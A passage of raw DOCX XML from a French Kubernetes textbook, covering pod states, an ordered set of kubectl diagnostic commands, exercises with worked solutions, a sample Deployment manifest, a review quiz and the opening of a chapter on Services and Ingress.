      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.242 — Six états et leur piste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8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État du pod</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="291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Signification</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="33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Première vérification</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2784"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Pending</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2916"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Non planifié</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3314"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>describe</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>, ressources et contraintes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="278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ContainerCreating</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="291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Image ou volume</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="331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describe</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>, événements</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2784"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>ImagePullBackOff</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2916"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Image inaccessible</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3314"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Nom, registre, secret</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="278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CrashLoopBackOff</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="291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Le conteneur meurt</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="331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logs --previous</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2784"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Running</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> non prêt</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2916"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Sonde readiness</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3314"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>describe</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>exec</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="278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Terminating</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> bloqué</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="291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Finaliseur</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="331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describe</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>66.6 Diagnostiquer</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un déploiement bloqué se diagnostique dans un ordre précis : événements, état des pods, journaux, puis ressources du nœud.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Six commandes ordonnées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kubectl get events -n production --sort-by=.lastTimestamp | tail -20</w:t>
        <w:br/>
        <w:t>kubectl describe deployment api -n production</w:t>
        <w:br/>
        <w:t>kubectl get pods -n production -o wide</w:t>
        <w:br/>
        <w:t>kubectl logs api-7d9f8c6b5-x2k4m -n production --previous</w:t>
        <w:br/>
        <w:t>kubectl describe node $(kubectl get pods -n production -o wide | awk</w:t>
        <w:br/>
        <w:t xml:space="preserve">  'NR==2{print $7}')</w:t>
        <w:br/>
        <w:t>kubectl top nodes</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DIAGNOSTIC D'UN DÉPLOIEMENT BLOQUÉ</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get pods</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> : quel est l'état exact ?</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describe</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> : quels événements récents ?</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logs --previous</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> : que dit le conteneur mort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Ressources : le pod tient-il dans un nœud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Sondes : sont-elles trop strictes ou trop précoces ?</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Kubernetes réconcilie en continu l'état réel et l'état désiré.</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pod est éphémère ; un Deployment gère les pods.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requêtes déterminent le placement, les limites l'exécution.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Une requête trop élevée produit un pod </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Pending</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w: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liveness redémarre, la readiness retire du trafic.</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liveness qui teste une dépendance provoque des redémarrages en cascade.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CrashLoopBackOff</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> se diagnostique avec </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>logs --previous</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>.</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rollout undo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> revient à la version précédente.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Les pods tournent. Le chapitre suivant les expose et les configure : services, entrées et configuration.</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66.1 — Écrire un déploiement complet</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Le service doit tourner en trois exemplaires avec des sondes.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Déclarez les ressources.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Ajoutez readiness et liveness.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le déploiement.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 66.2 — Diagnostiquer un CrashLoopBackOff</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Un pod redémarre toutes les trente secondes.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Lisez les journaux du conteneur mort.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Vérifiez la configuration.</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Testez l'image localement.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 66.3 — Corriger un pod Pending</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 xml:space="preserve">Le pod reste </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Pending</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> après application.</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Lisez les événements.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Vérifiez les ressources demandées.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Corrigez la contrainte.</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66.1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>apiVersion: apps/v1</w:t>
        <w:br/>
        <w:t>kind: Deployment</w:t>
        <w:br/>
        <w:t>metadata: { name: web, namespace: production }</w:t>
        <w:br/>
        <w:t>spec:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  replicas: 3</w:t>
        <w:br/>
        <w:t xml:space="preserve">  selector: { matchLabels: { app: web } }</w:t>
        <w:br/>
        <w:t xml:space="preserve">  template:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    metadata: { labels: { app: web } }</w:t>
        <w:br/>
        <w:t xml:space="preserve">    spec:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      containers:</w:t>
        <w:br/>
        <w:t xml:space="preserve">        - name: web</w:t>
        <w:br/>
        <w:t xml:space="preserve">          image: registry.exemple.fr/equipe/web:1.4.2</w:t>
        <w:br/>
        <w:t xml:space="preserve">          ports: [{ containerPort: 8080 }]</w:t>
        <w:br/>
        <w:t xml:space="preserve">          resources:</w:t>
        <w:br/>
        <w:t xml:space="preserve">            requests: { cpu: 100m, memory: 128Mi }</w:t>
        <w:br/>
        <w:t xml:space="preserve">            limits:   { cpu: 500m, memory: 256Mi }</w:t>
        <w:br/>
        <w:t xml:space="preserve">          readinessProbe:</w:t>
        <w:br/>
        <w:t xml:space="preserve">            httpGet: { path: /, port: 8080 }</w:t>
        <w:br/>
        <w:t xml:space="preserve">            periodSeconds: 5</w:t>
        <w:br/>
        <w:t xml:space="preserve">          livenessProbe:</w:t>
        <w:br/>
        <w:t xml:space="preserve">            httpGet: { path: /healthz, port: 8080 }</w:t>
        <w:br/>
        <w:t xml:space="preserve">            initialDelaySeconds: 10</w:t>
        <w:br/>
        <w:t xml:space="preserve">            periodSeconds: 20</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>maxUnavailable: 0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> garantit que le service reste disponible pendant la montée de version.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Des sondes distinctes évitent qu'un incident de dépendance déclenche des redémarrages.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 66.2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>kubectl get pod api-xxxx -n production</w:t>
        <w:br/>
        <w:t>kubectl describe pod api-xxxx -n production | tail -30</w:t>
        <w:br/>
        <w:t>kubectl logs api-xxxx -n production --previous</w:t>
        <w:br/>
        <w:br/>
        <w:t># Vérifier la configuration montée</w:t>
        <w:br/>
        <w:t>kubectl exec -it api-xxxx -n production -- env | sort</w:t>
        <w:br/>
        <w:t>kubectl get configmap api-config -n production -o yaml</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>--previous</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> est essentiel : les journaux du conteneur actuel sont souvent vides car il vient de redémarrer.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Une variable absente ou une base injoignable provoque une sortie immédiate avec un message explicite.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 66.3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>kubectl describe pod web-xxxx -n production | grep -A10 Events</w:t>
        <w:br/>
        <w:br/>
        <w:t># Exemples de messages</w:t>
        <w:br/>
        <w:t># 0/3 nodes are available: 3 Insufficient memory.</w:t>
        <w:br/>
        <w:t># 0/3 nodes are available: 3 node(s) had untolerated taint.</w:t>
        <w:br/>
        <w:br/>
        <w:t>kubectl describe nodes | grep -A5 "Allocated resources"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Un </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Pending</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> est presque toujours un problème de ressources, de sélecteur de nœud ou de tolérance.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Les événements du pod indiquent la contrainte exacte qui empêche le placement.</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 fait Kubernetes quand un pod d'un Deployment meurt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Rien</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Il le recrée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Il redémarre le nœud</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Il alerte seulement</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 xml:space="preserve">Quel effet a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>limits.cpu</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Redémarre le conteneur</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Étrangle le processeur disponible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Réserve un cœur</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Augmente la priorité</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 fait une readiness en échec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Redémarre le conteneur</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Retire le pod du service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Supprime le pod</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Augmente les réplicas</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 xml:space="preserve">Que signifie </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>CrashLoopBackOff</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Le pod attend un nœud</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 conteneur redémarre en boucle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L'image est absente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La sonde est trop lente</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Quelle commande annule un déploiement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kubectl delete pod</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kubectl rollout undo</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kubectl scale 0</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kubectl apply</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Le contrôleur compare le nombre de réplicas et recrée le pod manquant.</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Le conteneur est ralenti, jamais tué, pour une limite CPU.</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Le pod reste vivant mais ne reçoit plus de trafic.</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Le conteneur se termine immédiatement après chaque démarrage.</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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>rollout undo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> revient à la révision précédente.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pageBreakBefore/>
      </w:pPr>
      <w:r>
        <w:t>67. Services, entrées et configuration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="40" w:after="200" w:line="372" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Exposer les applications, répartir le trafic et sortir la configuration des images.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="80" w:line="230" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Durée de travail : 3 h 15 · Niveau : Intermédiaire · Prérequis : chapitre 66</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Choisir le type de Service adapté.</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Exposer une application HTTP avec un Ingress.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Distinguer ConfigMap et Secret.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Monter une configuration par variable ou par fichier.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Diagnostiquer une erreur 404 ou 503 d'ingress.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>67.1 Le problème de l'adresse instable</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Les pods vont et viennent : leur adresse change. Un Service fournit une adresse et un nom stables, et répartit le trafic entre les pods qui correspondent à un sélecteur.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
